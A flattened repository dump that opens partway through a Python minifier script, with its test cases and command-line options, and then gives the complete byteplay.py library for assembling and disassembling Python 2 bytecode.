nothing""" 587 | return f 588 | 589 | def test_reduce_operators(): 590 | """Test the case where an operator such as an open paren starts a line""" 591 | (a, b) = 1, 2 # The indentation level should be preserved 592 | pass 593 | 594 | def test_empty_functions(): 595 | """ 596 | This is a test method. 597 | This should be replaced with 'def empty_method: pass' 598 | """ 599 | 600 | class test_class(object): 601 | "Testing indented decorators" 602 | 603 | @test_decorator 604 | def foo(self): 605 | pass 606 | 607 | def test_function(): 608 | """ 609 | This function encapsulates the edge cases to prevent them from invading the 610 | global namespace. 611 | """ 612 | foo = ("The # character in this string should " # This comment 613 | "not result in a syntax error") # ...and this one should go away 614 | test_multi_line_list = [ 615 | 'item1', 616 | 'item2', 617 | 'item3' 618 | ] 619 | test_multi_line_dict = { 620 | 'item1': 1, 621 | 'item2': 2, 622 | 'item3': 3 623 | } 624 | # It may seem strange but the code below tests our docstring removal code. 625 | test_string_inside_operators = imaginary_function( 626 | "This string was indented but the tokenizer won't see it that way." 627 | ) # To understand how this could mess up docstring removal code see the 628 | # remove_comments_and_docstrings() function starting at this line: 629 | # "elif token_type == tokenize.STRING:" 630 | # This tests remove_extraneous_spaces(): 631 | this_line_has_leading_indentation = '''<--That extraneous space should be 632 | removed''' # But not these spaces 633 | 634 | def main(): 635 | usage = '%prog [options] ""' 636 | parser = OptionParser(usage=usage, version=__version__) 637 | parser.disable_interspersed_args() 638 | parser.add_option( 639 | "-o", "--outfile", 640 | dest="outfile", 641 | default=None, 642 | help="Save output to the given file.", 643 | metavar="" 644 | ) 645 | parser.add_option( 646 | "--bzip2", 647 | action="store_true", 648 | dest="bzip2", 649 | default=False, 650 | help="bzip2-compress the result into a self-executing python script." 651 | ) 652 | parser.add_option( 653 | "--gzip", 654 | action="store_true", 655 | dest="gzip", 656 | default=False, 657 | help="gzip-compress the result into a self-executing python script." 658 | ) 659 | options, args = parser.parse_args() 660 | try: 661 | source = open(args[0]).read() 662 | except Exception, e: 663 | print e 664 | parser.print_help() 665 | sys.exit(2) 666 | # Minify our input script 667 | result = minify(source) 668 | # Compress it if we were asked to do so 669 | if options.bzip2: 670 | result = bz2_pack(result) 671 | elif options.gzip: 672 | result = gz_pack(result) 673 | # Either save the result to the output file or print it to stdout 674 | if options.outfile: 675 | f = open(options.outfile, 'w') 676 | f.write(result) 677 | f.close() 678 | else: 679 | print result 680 | 681 | if __name__ == "__main__": 682 | main() 683 | ## end of http://code.activestate.com/recipes/576704/ }}} 684 | -------------------------------------------------------------------------------- /byteplay.py: -------------------------------------------------------------------------------- 1 | # byteplay - Python bytecode assembler/disassembler. 2 | # Copyright (C) 2006-2010 Noam Yorav-Raphael 3 | # Homepage: http://code.google.com/p/byteplay 4 | # 5 | # This library is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 2.1 of the License, or (at your option) any later version. 9 | # 10 | # This library is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public 16 | # License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 17 | 18 | # Many thanks to Greg X for adding support for Python 2.6 and 2.7! 19 | 20 | __all__ = ['opmap', 'opname', 'opcodes', 21 | 'cmp_op', 'hasarg', 'hasname', 'hasjrel', 'hasjabs', 22 | 'hasjump', 'haslocal', 'hascompare', 'hasfree', 'hascode', 23 | 'hasflow', 'getse', 24 | 'Opcode', 'SetLineno', 'Label', 'isopcode', 'Code', 25 | 'CodeList', 'printcodelist'] 26 | 27 | import opcode 28 | from dis import findlabels 29 | import types 30 | from array import array 31 | import operator 32 | import itertools 33 | import sys 34 | import warnings 35 | from cStringIO import StringIO 36 | import marshal 37 | 38 | ###################################################################### 39 | # Define opcodes and information about them 40 | 41 | python_version = '.'.join(str(x) for x in sys.version_info[:2]) 42 | if python_version not in ('2.4', '2.5', '2.6', '2.7'): 43 | warnings.warn("byteplay doesn't support Python version "+python_version) 44 | 45 | class Opcode(int): 46 | """An int which represents an opcode - has a nicer repr.""" 47 | def __repr__(self): 48 | return opname[self] 49 | __str__ = __repr__ 50 | 51 | class CodeList(list): 52 | """A list for storing opcode tuples - has a nicer __str__.""" 53 | def __str__(self): 54 | f = StringIO() 55 | printcodelist(self, f) 56 | return f.getvalue() 57 | 58 | opmap = dict((name.replace('+', '_'), Opcode(code)) 59 | for name, code in opcode.opmap.iteritems() 60 | if name != 'EXTENDED_ARG') 61 | opname = dict((code, name) for name, code in opmap.iteritems()) 62 | opcodes = set(opname) 63 | 64 | def globalize_opcodes(): 65 | for name, code in opmap.iteritems(): 66 | globals()[name] = code 67 | __all__.append(name) 68 | globalize_opcodes() 69 | 70 | cmp_op = opcode.cmp_op 71 | 72 | hasarg = set(x for x in opcodes if x >= opcode.HAVE_ARGUMENT) 73 | hasconst = set(Opcode(x) for x in opcode.hasconst) 74 | hasname = set(Opcode(x) for x in opcode.hasname) 75 | hasjrel = set(Opcode(x) for x in opcode.hasjrel) 76 | hasjabs = set(Opcode(x) for x in opcode.hasjabs) 77 | hasjump = hasjrel.union(hasjabs) 78 | haslocal = set(Opcode(x) for x in opcode.haslocal) 79 | hascompare = set(Opcode(x) for x in opcode.hascompare) 80 | hasfree = set(Opcode(x) for x in opcode.hasfree) 81 | hascode = set([MAKE_FUNCTION, MAKE_CLOSURE]) 82 | 83 | class _se: 84 | """Quick way of defining static stack effects of opcodes""" 85 | # Taken from assembler.py by Phillip J. Eby 86 | NOP = 0,0 87 | 88 | POP_TOP = 1,0 89 | ROT_TWO = 2,2 90 | ROT_THREE = 3,3 91 | ROT_FOUR = 4,4 92 | DUP_TOP = 1,2 93 | 94 | UNARY_POSITIVE = UNARY_NEGATIVE = UNARY_NOT = UNARY_CONVERT = \ 95 | UNARY_INVERT = GET_ITER = LOAD_ATTR = 1,1 96 | 97 | IMPORT_FROM = 1,2 98 | 99 | BINARY_POWER = BINARY_MULTIPLY = BINARY_DIVIDE = BINARY_FLOOR_DIVIDE = \ 100 | BINARY_TRUE_DIVIDE = BINARY_MODULO = BINARY_ADD = BINARY_SUBTRACT = \ 101 | BINARY_SUBSCR = BINARY_LSHIFT = BINARY_RSHIFT = BINARY_AND = \ 102 | BINARY_XOR = BINARY_OR = COMPARE_OP = 2,1 103 | 104 | INPLACE_POWER = INPLACE_MULTIPLY = INPLACE_DIVIDE = \ 105 | INPLACE_FLOOR_DIVIDE = INPLACE_TRUE_DIVIDE = INPLACE_MODULO = \ 106 | INPLACE_ADD = INPLACE_SUBTRACT = INPLACE_LSHIFT = INPLACE_RSHIFT = \ 107 | INPLACE_AND = INPLACE_XOR = INPLACE_OR = 2,1 108 | 109 | SLICE_0, SLICE_1, SLICE_2, SLICE_3 = \ 110 | (1,1),(2,1),(2,1),(3,1) 111 | STORE_SLICE_0, STORE_SLICE_1, STORE_SLICE_2, STORE_SLICE_3 = \ 112 | (2,0),(3,0),(3,0),(4,0) 113 | DELETE_SLICE_0, DELETE_SLICE_1, DELETE_SLICE_2, DELETE_SLICE_3 = \ 114 | (1,0),(2,0),(2,0),(3,0) 115 | 116 | STORE_SUBSCR = 3,0 117 | DELETE_SUBSCR = STORE_ATTR = 2,0 118 | DELETE_ATTR = STORE_DEREF = 1,0 119 | PRINT_NEWLINE = 0,0 120 | PRINT_EXPR = PRINT_ITEM = PRINT_NEWLINE_TO = IMPORT_STAR = 1,0 121 | STORE_NAME = STORE_GLOBAL = STORE_FAST = 1,0 122 | PRINT_ITEM_TO = 2,0 123 | 124 | LOAD_LOCALS = LOAD_CONST = LOAD_NAME = LOAD_GLOBAL = LOAD_FAST = \ 125 | LOAD_CLOSURE = LOAD_DEREF = BUILD_MAP = 0,1 126 | 127 | DELETE_FAST = DELETE_GLOBAL = DELETE_NAME = 0,0 128 | 129 | EXEC_STMT = 3,0 130 | BUILD_CLASS = 3,1 131 | 132 | STORE_MAP = MAP_ADD = 2,0 133 | SET_ADD = 1,0 134 | 135 | if python_version == '2.4': 136 | YIELD_VALUE = 1,0 137 | IMPORT_NAME = 1,1 138 | LIST_APPEND = 2,0 139 | elif python_version == '2.5': 140 | YIELD_VALUE = 1,1 141 | IMPORT_NAME = 2,1 142 | LIST_APPEND = 2,0 143 | elif python_version == '2.6': 144 | YIELD_VALUE = 1,1 145 | IMPORT_NAME = 2,1 146 | LIST_APPEND = 2,0 147 | elif python_version == '2.7': 148 | YIELD_VALUE = 1,1 149 | IMPORT_NAME = 2,1 150 | LIST_APPEND = 1,0 151 | 152 | 153 | _se = dict((op, getattr(_se, opname[op])) 154 | for op in opcodes 155 | if hasattr(_se, opname[op])) 156 | 157 | hasflow = opcodes - set(_se) - \ 158 | set([CALL_FUNCTION, CALL_FUNCTION_VAR, CALL_FUNCTION_KW, 159 | CALL_FUNCTION_VAR_KW, BUILD_TUPLE, BUILD_LIST, 160 | UNPACK_SEQUENCE, BUILD_SLICE, DUP_TOPX, 161 | RAISE_VARARGS, MAKE_FUNCTION, MAKE_CLOSURE]) 162 | if python_version == '2.7': 163 | hasflow = hasflow - set([BUILD_SET]) 164 | 165 | def getse(op, arg=None): 166 | """Get the stack effect of an opcode, as a (pop, push) tuple. 167 | 168 | If an arg is needed and is not given, a ValueError is raised. 169 | If op isn't a simple opcode, that is, the flow doesn't always continue 170 | to the next opcode, a ValueError is raised. 171 | """ 172 | try: 173 | return _se[op] 174 | except KeyError: 175 | # Continue to opcodes with an effect that depends on arg 176 | pass 177 | 178 | if arg is None: 179 | raise ValueError, "Opcode stack behaviour depends on arg" 180 | 181 | def get_func_tup(arg, nextra): 182 | if arg > 0xFFFF: 183 | raise ValueError, "Can only split a two-byte argument" 184 | return (nextra + 1 + (arg & 0xFF) + 2*((arg >> 8) & 0xFF), 185 | 1) 186 | 187 | if op == CALL_FUNCTION: 188 | return get_func_tup(arg, 0) 189 | elif op == CALL_FUNCTION_VAR: 190 | return get_func_tup(arg, 1) 191 | elif op == CALL_FUNCTION_KW: 192 | return get_func_tup(arg, 1) 193 | elif op == CALL_FUNCTION_VAR_KW: 194 | return get_func_tup(arg, 2) 195 | 196 | elif op == BUILD_TUPLE: 197 | return arg, 1 198 | elif op == BUILD_LIST: 199 | return arg, 1 200 | elif python_version == '2.7' and op == BUILD_SET: 201 | return arg, 1 202 | elif op == UNPACK_SEQUENCE: 203 | return 1, arg 204 | elif op == BUILD_SLICE: 205 | return arg, 1 206 | elif op == DUP_TOPX: 207 | return arg, arg*2 208 | elif op == RAISE_VARARGS: 209 | return 1+arg, 1 210 | elif op == MAKE_FUNCTION: 211 | return 1+arg, 1 212 | elif op == MAKE_CLOSURE: 213 | if python_version == '2.4': 214 | raise ValueError, "The stack effect of MAKE_CLOSURE depends on TOS" 215 | else: 216 | return 2+arg, 1 217 | else: 218 | raise ValueError, "The opcode %r isn't recognized or has a special "\ 219 | "flow control" % op 220 | 221 | class SetLinenoType(object): 222 | def __repr__(self): 223 | return 'SetLineno' 224 | SetLineno = SetLinenoType() 225 | 226 | class Label(object): 227 | pass 228 | 229 | def isopcode(obj): 230 | """Return whether obj is an opcode - not SetLineno or Label""" 231 | return obj is not SetLineno and not isinstance(obj, Label) 232 | 233 | # Flags from code.h 234 | CO_OPTIMIZED = 0x0001 # use LOAD/STORE_FAST instead of _NAME 235 | CO_NEWLOCALS = 0x0002 # only cleared for module/exec code 236 | CO_VARARGS = 0x0004 237 | CO_VARKEYWORDS = 0x0008 238 | CO_NESTED = 0x0010 # ??? 239 | CO_GENERATOR = 0x0020 240 | CO_NOFREE = 0x0040 # set if no free or cell vars 241 | CO_GENERATOR_ALLOWED = 0x1000 # unused 242 | # The future flags are only used on code generation, so we can ignore them. 243 | # (It does cause some warnings, though.) 244 | CO_FUTURE_DIVISION = 0x2000 245 | CO_FUTURE_ABSOLUTE_IMPORT = 0x4000 246 | CO_FUTURE_WITH_STATEMENT = 0x8000 247 | 248 | 249 | ###################################################################### 250 | # Define the Code class 251 | 252 | class Code(object): 253 | """An object which holds all the information which a Python code object 254 | holds, but in an easy-to-play-with representation. 255 | 256 | The attributes are: 257 | 258 | Affecting action 259 | ---------------- 260 | code - list of 2-tuples: the code 261 | freevars - list of strings: the free vars of the code (those are names 262 | of variables created in outer functions and used in the function) 263 | args - list of strings: the arguments of the code 264 | varargs - boolean: Does args end with a '*args' argument 265 | varkwargs - boolean: Does args end with a '**kwargs' argument 266 | newlocals - boolean: Should a new local namespace be created. 267 | (True in functions, False for module and exec code) 268 | 269 | Not affecting action 270 | -------------------- 271 | name - string: the name of the code (co_name) 272 | filename - string: the file name of the code (co_filename) 273 | firstlineno - int: the first line number (co_firstlineno) 274 | docstring - string or None: the docstring (the first item of co_consts, 275 | if it's str or unicode) 276 | 277 | code is a list of 2-tuples. The first item is an opcode, or SetLineno, or a 278 | Label instance. The second item is the argument, if applicable, or None. 279 | code can be a CodeList instance, which will produce nicer output when 280 | being printed. 281 | """ 282 | def __init__(self, code, freevars, args, varargs, varkwargs, newlocals, 283 | name, filename, firstlineno, docstring): 284 | self.code = code 285 | self.freevars = freevars 286 | self.args = args 287 | self.varargs = varargs 288 | self.varkwargs = varkwargs 289 | self.newlocals = newlocals 290 | self.name = name 291 | self.filename = filename 292 | self.firstlineno = firstlineno 293 | self.docstring = docstring 294 | 295 | @staticmethod 296 | def _findlinestarts(code): 297 | """Find the offsets in a byte code which are start of lines in the 298 | source. 299 | 300 | Generate pairs (offset, lineno) as described in Python/compile.c. 301 | 302 | This is a modified version of dis.findlinestarts, which allows multiple 303 | "line starts" with the same line number. 304 | """ 305 | byte_increments = [ord(c) for c in code.co_lnotab[0::2]] 306 | line_increments = [ord(c) for c in code.co_lnotab[1::2]] 307 | 308 | lineno = code.co_firstlineno 309 | addr = 0 310 | for byte_incr, line_incr in zip(byte_increments, line_increments): 311 | if byte_incr: 312 | yield (addr, lineno) 313 | addr += byte_incr 314 | lineno += line_incr 315 | yield (addr, lineno) 316 | 317 | @classmethod 318 | def from_code(cls, co): 319 | """Disassemble a Python code object into a Code object.""" 320 | co_code = co.co_code 321 | labels = dict((addr, Label()) for addr in findlabels(co_code)) 322 | linestarts = dict(cls._findlinestarts(co)) 323 | cellfree = co.co_cellvars + co.co_freevars 324 | 325 | code = CodeList() 326 | n = len(co_code) 327 | i = 0 328 | extended_arg = 0 329 | while i < n: 330 | op = Opcode(ord(co_code[i])) 331 | if i in labels: 332 | code.append((labels[i], None)) 333 | if i in linestarts: 334 | code.append((SetLineno, linestarts[i])) 335 | i += 1 336 | if op in hascode: 337 | lastop, lastarg = code[-1] 338 | if lastop != LOAD_CONST: 339 | raise ValueError, \ 340 | "%s should be preceded by LOAD_CONST code" % op 341 | code[-1] = (LOAD_CONST, Code.from_code(lastarg)) 342 | if op not in hasarg: 343 | code.append((op, None)) 344 | else: 345 | arg = ord(co_code[i]) + ord(co_code[i+1])*256 + extended_arg 346 | extended_arg = 0 347 | i += 2 348 | if op == opcode.EXTENDED_ARG: 349 | extended_arg = arg << 16 350 | elif op in hasconst: 351 | code.append((op, co.co_consts[arg])) 352 | elif op in hasname: 353 | code.append((op, co.co_names[arg])) 354 | elif op in hasjabs: 355 | code.append((op, labels[arg])) 356 | elif op in hasjrel: 357 | code.append((op, labels[i + arg])) 358 | elif op in haslocal: 359 | code.append((op, co.co_varnames[arg])) 360 | elif op in hascompare: 361 | code.append((op, cmp_op[arg])) 362 | elif op in hasfree: 363 | code.append((op, cellfree[arg])) 364 | else: 365 | code.append((op, arg)) 366 | 367 | varargs = bool(co.co_flags & CO_VARARGS) 368 | varkwargs = bool(co.co_flags & CO_VARKEYWORDS) 369 | newlocals = bool(co.co_flags & CO_NEWLOCALS) 370 | args = co.co_varnames[:co.co_argcount + varargs + varkwargs] 371 | if co.co_consts and isinstance(co.co_consts[0], basestring): 372 | docstring = co.co_consts[0] 373 | else: 374 | docstring = None 375 | return cls(code = code, 376 | freevars = co.co_freevars, 377 | args = args, 378 | varargs = varargs, 379 | varkwargs = varkwargs, 380 | newlocals = newlocals, 381 | name = co.co_name, 382 | filename = co.co_filename, 383 | firstlineno = co.co_firstlineno, 384 | docstring = docstring, 385 | ) 386 | 387 | def __eq__(self, other): 388 | if (self.freevars != other.freevars or 389 | self.args != other.args or 390 | self.varargs != other.varargs or 391 | self.varkwargs != other.varkwargs or 392 | self.newlocals != other.newlocals or 393 | self.name != other.name or 394 | self.filename != other.filename or 395 | self.firstlineno != other.firstlineno or 396 | self.docstring != other.docstring or 397 | len(self.code) != len(other.code) 398 | ): 399 | return False 400 | 401 | # Compare code. This isn't trivial because labels should be matching, 402 | # not equal. 403 | labelmapping = {} 404 | for (op1, arg1), (op2, arg2) in itertools.izip(self.code, other.code): 405 | if isinstance(op1, Label): 406 | if labelmapping.setdefault(op1, op2) is not op2: 407 | return False 408 | else: 409 | if op1 != op2: 410 | return False 411 | if op1 in hasjump: 412 | if labelmapping.setdefault(arg1, arg2) is not arg2: 413 | return False 414 | elif op1 in hasarg: 415 | if arg1 != arg2: 416 | return False 417 | return True 418 | 419 | def _compute_flags(self): 420 | opcodes = set(op for op, arg in self.code if isopcode(op)) 421 | 422 | optimized = (STORE_NAME not in opcodes and 423 | LOAD_NAME not in opcodes and 424 | DELETE_NAME not in opcodes) 425 | generator = (YIELD_VALUE in opcodes) 426 | nofree = not (opcodes.intersection(hasfree)) 427 | 428 | flags = 0 429 | if optimized: flags |= CO_OPTIMIZED 430 | if self.newlocals: flags |= CO_NEWLOCALS 431 | if self.varargs: flags |= CO_VARARGS 432 | if self.varkwargs: flags |= CO_VARKEYWORDS 433 | if generator: flags |= CO_GENERATOR 434 | if nofree: flags |= CO_NOFREE 435 | return flags 436 | 437 | def _compute_stacksize(self): 438 | """Get a code list, compute its maximal stack usage.""" 439 | # This is done by scanning the code, and computing for each opcode 440 | # the stack state at the opcode. 441 | code = self.code 442 | 443 | # A mapping from labels to their positions in the code list 444 | label_pos = dict((op, pos) 445 | for pos, (op, arg) in enumerate(code) 446 | if isinstance(op, Label)) 447 | 448 | # sf_targets are the targets of SETUP_FINALLY opcodes. They are recorded 449 | # because they have special stack behaviour. If an exception was raised 450 | # in the block pushed by a SETUP_FINALLY opcode, the block is popped 451 | # and 3 objects are pushed. On return or continue, the block is popped 452 | # and 2 objects are pushed. If nothing happened, the block is popped by 453 | # a POP_BLOCK opcode and 1 object is pushed by a (LOAD_CONST, None) 454 | # operation. 455 | # 456 | # Our solution is to record the stack state of SETUP_FINALLY targets 457 | # as having 3 objects pushed, which is the maximum. However, to make 458 | # stack recording consistent, the get_next_stacks function will always 459 | # yield the stack state of the target as if 1 object was pushed, but 460 | # this will be corrected in the actual stack recording. 461 | 462 | sf_targets = set(label_pos[arg] 463 | for op, arg in code 464 | if op == SETUP_FINALLY) 465 | 466 | # What we compute - for each opcode, its stack state, as an n-tuple. 467 | # n is the number of blocks pushed. For each block, we record the number 468 | # of objects pushed. 469 | stacks = [None] * len(code) 470 | 471 | def get_next_stacks(pos, curstack): 472 | """Get a code position and the stack state before the operation 473 | was done, and yield pairs (pos, curstack) for the next positions 474 | to be explored - those are the positions to which you can get 475 | from the given (pos, curstack). 476 | 477 | If the given position was already explored, nothing will be yielded. 478 | """ 479 | op, arg = code[pos] 480 | 481 | if isinstance(op, Label): 482 | # We should check if we already reached a node only if it is 483 | # a label. 484 | if pos in sf_targets: 485 | curstack = curstack[:-1] + (curstack[-1] + 2,) 486 | if stacks[pos] is None: 487 | stacks[pos] = curstack 488 | else: 489 | if stacks[pos] != curstack: 490 | raise ValueError, "Inconsistent code" 491 | return 492 | 493 | def newstack(n): 494 | # Return a new stack, modified by adding n elements to the last 495 | # block 496 | if curstack[-1] + n < 0: 497 | raise ValueError, "Popped a non-existing element" 498 | return curstack[:-1] + (curstack[-1]+n,) 499 | 500 | if not isopcode(op): 501 | # label or SetLineno - just continue to next line 502 | yield pos+1, curstack 503 | 504 | elif op in (STOP_CODE, RETURN_VALUE, RAISE_VARARGS): 505 | # No place in particular to continue to 506 | pass 507 | 508 | elif op == MAKE_CLOSURE and python_version == '2.4': 509 | # This is only relevant in Python 2.4 - in Python 2.5 the stack 510 | # effect of MAKE_CLOSURE can be calculated from the arg. 511 | # In Python 2.4, it depends on the number of freevars of TOS, 512 | # which should be a code object. 513 | if pos == 0: 514 | raise ValueError, \ 515 | "MAKE_CLOSURE can't be the first opcode" 516 | lastop, lastarg = code[pos-1] 517 | if lastop != LOAD_CONST: 518 | raise ValueError, \ 519 | "MAKE_CLOSURE should come after a LOAD_CONST op" 520 | try: 521 | nextrapops = len(lastarg.freevars) 522 | except AttributeError: 523 | try: 524 | nextrapops = len(lastarg.co_freevars) 525 | except AttributeError: 526 | raise ValueError, \ 527 | "MAKE_CLOSURE preceding const should "\ 528 | "be a code or a Code object" 529 | 530 | yield pos+1, newstack(-arg-nextrapops) 531 | 532 | elif op not in hasflow: 533 | # Simple change of stack 534 | pop, push = getse(op, arg) 535 | yield pos+1, newstack(push - pop) 536 | 537 | elif op in (JUMP_FORWARD, JUMP_ABSOLUTE): 538 | # One possibility for a jump 539 | yield label_pos[arg], curstack 540 | 541 | elif python_version < '2.7' and op in (JUMP_IF_FALSE, JUMP_IF_TRUE): 542 | # Two possibilities for a jump 543 | yield label_pos[arg], curstack 544 | yield pos+1, curstack 545 | 546 | elif python_version >= '2.7' and op in (POP_JUMP_IF_FALSE, POP_JUMP_IF_TRUE): 547 | # Two possibilities for a jump 548 | yield label_pos[arg], newstack(-1) 549 | yield pos+1, newstack(-1) 550 | 551 | elif python_version >= '2.7' and op in (JUMP_IF_TRUE_OR_POP, JUMP_IF_FALSE_OR_POP): 552 | # Two possibilities for a jump 553 | yield label_pos[arg], curstack 554 | yield pos+1, newstack(-1) 555 | 556 | elif op == FOR_ITER: 557 | # FOR_ITER pushes next(TOS) on success, and pops TOS and jumps 558 | # on failure 559 | yield label_pos[arg], newstack(-1) 560 | yield pos+1, newstack(1) 561 | 562 | elif op == BREAK_LOOP: 563 | # BREAK_LOOP jumps to a place specified on block creation, so 564 | # it is ignored here 565 | pass 566 | 567 | elif op == CONTINUE_LOOP: 568 | # CONTINUE_LOOP jumps to the beginning of a loop which should 569 | # already ave been discovered, but we verify anyway. 570 | # It pops a block. 571 | if python_version == '2.6': 572 | pos, stack = label_pos[arg], curstack[:-1] 573 | if stacks[pos] != stack: #this could be a loop with a 'with' inside 574 | yield pos, stack[:-1] + (stack[-1]-1,) 575 | else: 576 | yield pos, stack 577 | else: 578 | yield label_pos[arg], curstack[:-1] 579 | 580 | elif op == SETUP_LOOP: 581 | # We continue with a new block. 582 | # On break, we jump to the label and return to current stack 583 | # state. 584 | yield label_pos[arg], curstack 585 | yield pos+1, curstack + (0,) 586 | 587 | elif op == SETUP_EXCEPT: 588 | # We continue with a new block. 589 | # On exception, we jump to the label with 3 extra objects on 590 | # stack 591 | yield label_pos[arg], newstack(3) 592 | yield pos+1, curstack + (0,) 593 | 594 | elif op == SETUP_FINALLY: 595 | # We continue with a new block. 596 | # On exception, we jump to the label with 3 extra objects on 597 | # stack, but to keep stack recording consistent, we behave as 598 | # if we add only 1 object. Extra 2 will be added to the actual 599 | # recording. 600 | yield label_pos[arg], newstack(1) 601 | yield pos+1, curstack + (0,) 602 | 603 | elif python_version == '2.7' and op == SETUP_WITH: 604 | yield label_pos[arg], curstack 605 | yield pos+1, newstack(-1) + (1,) 606 | 607 | elif op == POP_BLOCK: 608 | # Just pop the block 609 | yield pos+1, curstack[:-1] 610 | 611 | elif op == END_FINALLY: 612 | # Since stack recording of SETUP_FINALLY targets is of 3 pushed 613 | # objects (as when an exception is raised), we pop 3 objects. 614 | yield pos+1, newstack(-3) 615 | 616 | elif op == WITH_CLEANUP: 617 | # Since WITH_CLEANUP is always found after SETUP_FINALLY 618 | # targets, and the stack recording is that of a raised 619 | # exception, we can simply pop 1 object and let END_FINALLY 620 | # pop the remaining 3. 621 | if python_version == '2.7': 622 | yield pos+1, newstack(2) 623 | else: 624 | yield pos+1, newstack(-1) 625 | 626 | else: 627 | assert False, "Unhandled opcode: %r" % op 628 | 629 | 630 | # Now comes the calculation: open_positions holds positions which are 631 | # yet to be explored. In each step we take one open position, and 632 | # explore it by adding the positions to which you can get from it, to 633 | # open_positions. On the way, we update maxsize. 634 | # open_positions is a list of tuples: (pos, stack state) 635 | maxsize = 0 636 | open_positions = [(0, (0,))] 637 | while open_positions: 638 | pos, curstack = open_positions.pop() 639 | maxsize = max(maxsize, sum(curstack)) 640 | open_positions.extend(get_next_stacks(pos, curstack)) 641 | 642 | return maxsize 643 | 644 | def to_code(self): 645 | """Assemble a Python code object from a Code object.""" 646 | co_argcount = len(self.args) - self.varargs - self.varkwargs 647 | co_stacksize = self._compute_stacksize() 648 | co_flags = self._compute_flags() 649 | 650 | co_consts = [self.docstring] 651 | co_names = [] 652 | co_varnames = list(self.args) 653 | 654 | co_freevars = tuple(self.freevars) 655 | 656 | # We find all cellvars beforehand, for two reasons: 657 | # 1. We need the number of them to construct the numeric argument 658 | # for ops in "hasfree". 659 | # 2. We need to put arguments which are cell vars in the beginning 660 | # of co_cellvars 661 | cellvars = set(arg for op, arg in self.code 662 | if isopcode(op) and op in hasfree 663 | and arg not in co_freevars) 664 | co_cellvars = [x for x in self.args if x in cellvars] 665 | 666 | def index(seq, item, eq=operator.eq, can_append=True): 667 | """Find the index of item in a sequence and return it. 668 | If it is not found in the sequence, and can_append is True, 669 | it is appended to the sequence. 670 | 671 | eq is the equality operator to use. 672 | """ 673 | for i, x in enumerate(seq): 674 | if eq(x, item): 675 | return i 676 | else: 677 | if can_append: 678 | seq.append(item) 679 | return len(seq) - 1 680 | else: 681 | raise IndexError, "Item not found" 682 | 683 | # List of tuples (pos, label) to be filled later 684 | jumps = [] 685 | # A mapping from a label to its position 686 | label_pos = {} 687 | # Last SetLineno 688 | lastlineno = self.firstlineno 689 | lastlinepos = 0 690 | 691 | co_code = array('B') 692 | co_lnotab = array('B') 693 | for i, (op, arg) in enumerate(self.code): 694 | if isinstance(op, Label): 695 | label_pos[op] = len(co_code) 696 | 697 | elif op is SetLineno: 698 | incr_lineno = arg - lastlineno 699 | incr_pos = len(co_code) - lastlinepos 700 | lastlineno = arg 701 | lastlinepos = len(co_code) 702 | 703 | if incr_lineno == 0 and incr_pos == 0: 704 | co_lnotab.append(0) 705 | co_lnotab.append(0) 706 | else: 707 | while incr_pos > 255: 708 | co_lnotab.append(255) 709 | co_lnotab.append(0) 710 | incr_pos -= 255 711 | while incr_lineno > 255: 712 | co_lnotab.append(incr_pos) 713 | co_lnotab.append(255) 714 | incr_pos = 0 715 | incr_lineno -= 255 716 | if incr_pos or incr_lineno: 717 | co_lnotab.append(incr_pos) 718 | co_lnotab.append(incr_lineno) 719 | 720 | elif op == opcode.EXTENDED_ARG: 721 | raise ValueError, "EXTENDED_ARG not supported in Code objects" 722 | 723 | elif not op in hasarg: 724 | co_code.append(op) 725 | 726 | else: 727 | if op in hasconst: 728 | if isinstance(arg, Code) and i < len(self.code)-1 and \ 729 | self.code[i+1][0] in hascode: 730 | arg = arg.to_code() 731 | arg = index(co_consts, arg, operator.is_) 732 | elif op in hasname: 733 | arg = index(co_names, arg) 734 | elif op in hasjump: 735 | # arg will be filled later 736 | jumps.append((len(co_code), arg)) 737 | arg = 0 738 | elif op in haslocal: 739 | arg = index(co_varnames, arg) 740 | elif op in hascompare: 741 | arg = index(cmp_op, arg, can_append=False) 742 | elif op in hasfree: 743 | try: 744 | arg = index(co_freevars, arg, can_append=False) \ 745 | + len(cellvars) 746 | except IndexError: 747 | arg = index(co_cellvars, arg) 748 | else: 749 | # arg is ok 750 | pass 751 | 752 | if arg > 0xFFFF: 753 | co_code.append(opcode.EXTENDED_ARG) 754 | co_code.append((arg >> 16) & 0xFF) 755 | co_code.append((arg >> 24) & 0xFF) 756 | co_code.append(op) 757 | co_code.append(arg & 0xFF) 758 | co_code.append((arg >> 8) & 0xFF) 759 | 760 | for pos, label in jumps: 761 | jump = label_pos[label] 762 | if co_code[pos] in hasjrel: 763 | jump -= pos+3 764 | if jump > 0xFFFF: 765 | raise NotImplementedError, "Extended jumps not implemented" 766 | co_code[pos+1] = jump & 0xFF 767 | co_code[pos+2] = (jump >> 8) & 0xFF 768 | 769 | co_code = co_code.tostring() 770 | co_lnotab = co_lnotab.tostring() 771 | 772 | co_consts = tuple(co_consts) 773 | co_names = tuple(co_names) 774 | co_varnames = tuple(co_varnames) 775 | co_nlocals = len(co_varnames) 776 | co_cellvars = tuple(co_cellvars) 777 | 778 | return types.CodeType(co_argcount, co_nlocals, co_stacksize, co_flags, 779 | co_code, co_consts, co_names, co_varnames, 780 | self.filename, self.name, self.firstlineno, co_lnotab, 781 | co_freevars, co_cellvars) 782 | --------------------------------------------------------------------------------